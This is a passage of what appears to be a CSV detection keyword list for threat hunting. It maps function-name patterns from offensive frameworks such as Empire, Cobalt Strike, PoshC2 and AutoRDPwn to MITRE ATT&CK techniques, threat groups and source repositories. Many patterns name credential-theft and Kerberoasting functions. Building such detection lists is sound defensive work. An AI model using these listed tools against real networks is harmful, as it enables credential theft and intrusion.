-*getCrossC2Site*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*Get-DCBadPwdCount*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DecodedPassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecodedPassword*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-DecryptedCpassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecryptedCpassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DecryptedPassword*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-DecryptedPassword*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-DecryptedSitelistPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-delegation *All*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*get-delegation *Unconstrained*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*Get-DFSshare*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-DiscosdurosGet-PSDrive*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*getdllbaseaddress*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get-dodgyprocesses*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-DomainAdmins.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Get-DomainComputer -TrustedToAuth | select name,offensive_tool_keyword,AD exploitation cheat sheet,msds-allowedtodelegateto*,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainDFSShareV1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainDFSShareV2*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainForeignGroupMember*,offensive_tool_keyword,AD exploitation cheat sheet,Abusing inter-forest trust Powersploit,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainManagedSecurityGroup*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainObjectACL -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainSearcher*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetDomainsForEnumeration*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Get-DomainSpn*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SQLInstanceDomain.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getdomainspnticket*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-DomainSPNTicket*,offensive_tool_keyword,BloodHound,Kerberoasting With PowerView,T1558 - T1208 - T1552,TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*Get-DomainSPNTicket*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-DomainSPNTicket*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainSPNTicket*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-DomainUser -KerberosPreuthNotRequired -Verbose*,greyware_tool_keyword,powershell,Powerview Enumerate users,T1069.002 - T1087.002 - T1018,TA0007 - 